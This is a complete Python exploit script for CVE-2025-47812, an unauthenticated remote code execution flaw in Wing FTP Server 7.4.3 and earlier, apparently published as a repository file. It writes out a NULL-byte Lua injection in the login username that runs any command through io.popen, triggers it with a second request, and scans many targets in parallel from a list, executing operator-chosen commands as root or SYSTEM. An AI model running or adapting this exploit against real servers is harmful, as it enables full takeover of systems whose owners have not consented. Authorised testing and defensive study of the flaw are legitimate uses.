README.md
Rendering markdown...
#!/usr/bin/env python3
# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
# CVE: CVE-2025-47812
# Date: 2025-06-30
# Original Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r)
# Modified by: d3vn0mi (https://github.com/d3vn0mi)
# Vendor Homepage: https://www.wftpserver.com/
# Version: Wing FTP Server <= 7.4.3
# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges)
# Description:
# Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated
# remote code execution (RCE) flaw (CVE-2025-47812). This vulnerability arises from
# improper handling of NULL bytes in the 'username' parameter during login, leading
# to Lua code injection into session files. These maliciously crafted session files
# are subsequently executed when authenticated functionalities (e.g., /dir.html) are
# accessed, resulting in arbitrary command execution on the server with elevated
# privileges (root on Linux, SYSTEM on Windows).
import argparse
import logging
import re
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import quote, urlparse
import requests
import urllib3
# Silence urllib3's InsecureRequestWarning. NOTE: this call runs unconditionally
# at import time, not only when --no-verify is passed on the command line.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# ASCII-art banner that main() prints at startup.
BANNER = r"""
____ _______ ___ __ ____ __ ___ ____
/ __ \|__ / | / / | / / __ \/ |/ // _/
/ / / / /_ <| | / /| |/ / / / / /|_/ / / /
/ /_/ /___/ /| |/ / | / /_/ / / / /_/ /
/_____/____/ |___/ |_/ \____/_/ /_/____/
CVE-2025-47812 | Wing FTP Server <= 7.4.3
Unauthenticated Remote Code Execution
Original Author: 4m3rr0r | Modified: d3vn0mi
"""
# Default command used when no custom command is provided (safe check)
DEFAULT_CHECK_CMD = "echo CVE-2025-47812-VULN"
# The text that DEFAULT_CHECK_CMD echoes back.
VULN_MARKER = "CVE-2025-47812-VULN"
# Module-level logger; its handlers are attached by setup_logging().
logger = logging.getLogger("cve-2025-47812")
def setup_logging(verbose: bool = False, log_file: str | None = None) -> None:
    """Configure the module logger with console and optional file output.

    Args:
        verbose: When true the console shows DEBUG and above; otherwise it
            shows INFO and above.
        log_file: Optional path of a UTF-8 log file. The file receives DEBUG
            and above regardless of ``verbose``.
    """
    console_level = logging.DEBUG if verbose else logging.INFO
    # A logger's own level filters records before any handler sees them, so it
    # must be at least as permissive as the most verbose handler. Leaving it at
    # INFO would silently drop the DEBUG records the file handler asks for.
    logger.setLevel(logging.DEBUG if log_file else console_level)

    # Drop handlers left over from an earlier call so that configuring twice
    # does not emit every record twice.
    for stale in list(logger.handlers):
        logger.removeHandler(stale)
        stale.close()

    formatter = logging.Formatter(
        "%(asctime)s [%(levelname)s] %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
    )

    # Console handler with color support
    console = logging.StreamHandler(sys.stderr)
    console.setLevel(console_level)
    console.setFormatter(_ColorFormatter(formatter))
    logger.addHandler(console)

    # Optional file handler (no colors)
    if log_file:
        fh = logging.FileHandler(log_file, encoding="utf-8")
        fh.setLevel(logging.DEBUG)
        fh.setFormatter(formatter)
        logger.addHandler(fh)
        logger.info("Logging to file: %s", log_file)
class _ColorFormatter(logging.Formatter):
"""Wrap an existing formatter to inject ANSI colors per level."""
COLORS = {
logging.DEBUG: "\033[90m", # gray
logging.INFO: "\033[92m", # green
logging.WARNING: "\033[93m", # yellow
logging.ERROR: "\033[91m", # red
logging.CRITICAL: "\033[95m", # magenta
}
RESET = "\033[0m"
def __init__(self, base_formatter: logging.Formatter):
super().__init__()
self._base = base_formatter
def format(self, record: logging.LogRecord) -> str:
msg = self._base.format(record)
color = self.COLORS.get(record.levelno, "")
return f"{color}{msg}{self.RESET}"
def validate_url(url: str) -> str:
    """Strip trailing slashes from *url* and check that it is usable.

    Returns the trimmed URL.

    Raises:
        ValueError: If the scheme is not http/https or no hostname is present.
    """
    trimmed = url.rstrip("/")
    parts = urlparse(trimmed)

    scheme_ok = parts.scheme in ("http", "https")
    if not scheme_ok:
        raise ValueError(f"Unsupported URL scheme: {parts.scheme!r}")

    if parts.hostname:
        return trimmed
    raise ValueError(f"Missing hostname in URL: {trimmed!r}")
def build_payload(username: str, password: str, command: str) -> str:
    """Construct the injection payload for the login POST body.

    ``username`` and ``password`` are percent-encoded with ``quote``;
    ``command`` is interpolated into the body verbatim.

    Returns:
        The ``username=...&password=...`` form body as a single string.
    """
    encoded_username = quote(username)
    encoded_password = quote(password)
    # The NULL byte terminates the C string in c_CheckUser(), but the full
    # username (including Lua code) is written into the session file.
    lua_injection = (
        "%00]]%0d"
        f"local+h+%3d+io.popen(\"{command}\")%0d"
        "local+r+%3d+h%3aread(\"*a\")%0d"
        "h%3aclose()%0d"
        "print(r)%0d"
        "--"
    )
    return f"username={encoded_username}{lua_injection}&password={encoded_password}"
def run_exploit(
    target_url: str,
    command: str,
    username: str = "anonymous",
    password: str = "",
    timeout: int = 15,
    verify_ssl: bool = True,
    retries: int = 2,
) -> tuple[bool, str]:
    """Run the CVE-2025-47812 check against a single target.

    Args:
        target_url: Base URL of the target (http or https).
        command: Command placed into the payload.
        username: Username sent in the login body.
        password: Password sent in the login body.
        timeout: Per-request timeout in seconds.
        verify_ssl: Whether TLS certificates are verified.
        retries: Number of retries per request after the first attempt.

    Returns:
        A tuple ``(is_vulnerable, output)``. ``(False, "")`` is returned when
        either request fails or no UID cookie is issued.

    Raises:
        ValueError: If ``target_url`` is rejected by ``validate_url``.
    """
    target_url = validate_url(target_url)
    host = urlparse(target_url).netloc
    common_headers = {
        "Host": host,
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
    }
    login_url = f"{target_url}/loginok.html"
    payload = build_payload(username, password, command)
    login_headers = {
        **common_headers,
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": target_url,
        "Referer": f"{target_url}/login.html?lang=english",
        "Cookie": "client_lang=english",
    }

    # --- Stage 1: POST to inject Lua via session file ---
    logger.debug("Stage 1 -> POST %s (user=%s, cmd=%s)", login_url, username, command)
    login_response = _request_with_retry(
        "POST", login_url, headers=login_headers, data=payload,
        timeout=timeout, verify=verify_ssl, retries=retries,
    )
    if login_response is None:
        return False, ""

    set_cookie = login_response.headers.get("Set-Cookie", "")
    match = re.search(r"UID=([^;]+)", set_cookie)
    if not match:
        logger.error("UID not found in Set-Cookie for %s — exploit may have failed", target_url)
        return False, ""
    uid = match.group(1)
    logger.debug("Extracted UID: %s", uid)

    # --- Stage 2: GET /dir.html to trigger Lua execution ---
    dir_url = f"{target_url}/dir.html"
    dir_headers = {
        **common_headers,
        "Cookie": f"UID={uid}",
    }
    logger.debug("Stage 2 -> GET %s (UID=%s)", dir_url, uid)
    dir_response = _request_with_retry(
        "GET", dir_url, headers=dir_headers,
        timeout=timeout, verify=verify_ssl, retries=retries,
    )
    if dir_response is None:
        return False, ""

    # Extract command output (appears before XML response body)
    body = dir_response.text
    clean_output = re.split(r"<\?xml", body)[0].strip()

    if command == DEFAULT_CHECK_CMD:
        # For the built-in safe check the expected output is known, so demand
        # the marker. Treating any non-empty text as proof would flag ordinary
        # HTML pages (error or login pages) as vulnerable.
        is_vuln = VULN_MARKER in clean_output
    else:
        # The output of a custom command cannot be predicted; keep the
        # "anything before the XML body" heuristic.
        is_vuln = bool(clean_output)

    if is_vuln:
        logger.info("VULNERABLE: %s", target_url)
    else:
        logger.warning("Not vulnerable: %s", target_url)
    return is_vuln, clean_output
def _request_with_retry(
    method: str,
    url: str,
    retries: int = 2,
    **kwargs,
) -> requests.Response | None:
    """Send an HTTP request, retrying with exponential backoff on failure.

    Args:
        method: HTTP method name passed to ``requests.request``.
        url: Request URL.
        retries: Number of retries after the first attempt. Negative values
            are treated as 0 so that one request is always sent.
        **kwargs: Forwarded unchanged to ``requests.request``.

    Returns:
        The response on success, or ``None`` once every attempt has failed.
        A non-2xx status counts as a failure because ``raise_for_status`` is
        called on each response.
    """
    # A negative count would make the loop below empty and return None
    # without ever contacting the server.
    retries = max(retries, 0)
    total_attempts = retries + 1

    for attempt in range(1, total_attempts + 1):
        try:
            resp = requests.request(method, url, **kwargs)
            resp.raise_for_status()
            return resp
        except requests.exceptions.RequestException as exc:
            if attempt > retries:
                logger.error("Request to %s failed after %d attempts: %s", url, attempt, exc)
                break
            wait = 2 ** attempt  # 2s, 4s, 8s, ...
            logger.warning(
                "Request to %s failed (attempt %d/%d): %s — retrying in %ds",
                url, attempt, total_attempts, exc, wait,
            )
            time.sleep(wait)
    return None
def load_targets(url: str | None, filepath: str | None) -> list[str]:
"""Return a deduplicated list of target URLs from CLI args."""
targets: list[str] = []
if filepath:
try:
with open(filepath, "r") as fh:
for line in fh:
stripped = line.strip()
if stripped and not stripped.startswith("#"):
targets.append(stripped)
except OSError as exc:
logger.error("Could not read target file %r: %s", filepath, exc)
sys.exit(1)
if url:
targets.append(url)
# Deduplicate while preserving order
seen: set[str] = set()
unique: list[str] = []
for t in targets:
normed = t.rstrip("/")
if normed not in seen:
seen.add(normed)
unique.append(normed)
return unique
def _build_arg_parser() -> argparse.ArgumentParser:
    """Create the command-line parser with all of its option groups."""
    parser = argparse.ArgumentParser(
        description="CVE-2025-47812 — Wing FTP Server <= 7.4.3 Unauthenticated RCE",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="Examples:\n"
               " %(prog)s -u http://192.168.1.10\n"
               " %(prog)s -u http://192.168.1.10 -c 'id'\n"
               " %(prog)s -f targets.txt -o vuln.txt -t 8\n",
    )

    target_group = parser.add_argument_group("target")
    target_group.add_argument(
        "-u", "--url", type=str,
        help="Single target URL (e.g. http://192.168.134.130)",
    )
    target_group.add_argument(
        "-f", "--file", type=str,
        help="File containing target URLs (one per line, # comments allowed)",
    )

    exploit_group = parser.add_argument_group("exploit options")
    exploit_group.add_argument(
        "-c", "--command", type=str,
        help="Command to execute on the remote server (enables verbose output)",
    )
    exploit_group.add_argument(
        "-U", "--username", type=str, default="anonymous",
        help="Username for the exploit payload (default: anonymous)",
    )
    exploit_group.add_argument(
        "-P", "--password", type=str, default="",
        help="Password for the exploit payload (default: empty)",
    )

    output_group = parser.add_argument_group("output")
    output_group.add_argument(
        "-v", "--verbose", action="store_true",
        help="Enable verbose / debug logging",
    )
    output_group.add_argument(
        "-o", "--output", type=str,
        help="Save vulnerable URLs to this file",
    )
    output_group.add_argument(
        "-l", "--log-file", type=str,
        help="Write detailed log to this file",
    )

    net_group = parser.add_argument_group("network")
    net_group.add_argument(
        "-t", "--threads", type=int, default=1,
        help="Number of concurrent threads for multi-target scans (default: 1)",
    )
    net_group.add_argument(
        "--timeout", type=int, default=15,
        help="HTTP request timeout in seconds (default: 15)",
    )
    net_group.add_argument(
        "--retries", type=int, default=2,
        help="Number of retries on connection failure (default: 2)",
    )
    net_group.add_argument(
        "--no-verify", action="store_true",
        help="Disable SSL certificate verification",
    )
    return parser


def main() -> None:
    """Parse CLI arguments, process every target, and print a summary.

    Exits with status 1 when no targets are loaded, and with argparse's usage
    error when the arguments are missing or out of range.
    """
    parser = _build_arg_parser()
    args = parser.parse_args()

    if not args.url and not args.file:
        parser.error("Either -u/--url or -f/--file must be specified.")
    # Reject numeric options up front; otherwise they surface later as an
    # opaque ValueError from the thread pool or the HTTP layer.
    if args.threads < 1:
        parser.error("-t/--threads must be at least 1.")
    if args.timeout <= 0:
        parser.error("--timeout must be a positive number of seconds.")
    if args.retries < 0:
        parser.error("--retries must not be negative.")

    # When a custom command is provided, force verbose so the user sees output
    verbose = args.verbose or bool(args.command)
    setup_logging(verbose=verbose, log_file=args.log_file)
    print(BANNER)

    command = args.command if args.command else DEFAULT_CHECK_CMD
    targets = load_targets(args.url, args.file)
    if not targets:
        logger.error("No valid targets provided.")
        sys.exit(1)
    logger.info("Loaded %d target(s) — threads=%d, timeout=%ds, retries=%d",
                len(targets), args.threads, args.timeout, args.retries)

    vulnerable: list[str] = []
    verify_ssl = not args.no_verify

    def _attack(target: str) -> tuple[str, bool, str]:
        is_vuln, output = run_exploit(
            target, command,
            username=args.username,
            password=args.password,
            timeout=args.timeout,
            verify_ssl=verify_ssl,
            retries=args.retries,
        )
        return target, is_vuln, output

    with ThreadPoolExecutor(max_workers=args.threads) as pool:
        futures = {pool.submit(_attack, t): t for t in targets}
        for future in as_completed(futures):
            target = futures[future]
            try:
                target, is_vuln, output = future.result()
            except Exception:
                # Keep going: one bad target must not abort the whole run.
                logger.exception("Unhandled error processing %s", target)
                continue
            if is_vuln:
                vulnerable.append(target)
                if args.command:
                    print(f"\n--- Output from {target} ---")
                    print(output)
                    print("----------------------------\n")

    # Summary
    print()
    logger.info("Scan complete: %d/%d targets vulnerable", len(vulnerable), len(targets))
    if args.output and vulnerable:
        try:
            with open(args.output, "w", encoding="utf-8") as out_file:
                out_file.writelines(site + "\n" for site in vulnerable)
            logger.info("Vulnerable URLs saved to: %s", args.output)
        except OSError as exc:
            logger.error("Could not write to output file %r: %s", args.output, exc)
# Run the CLI only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()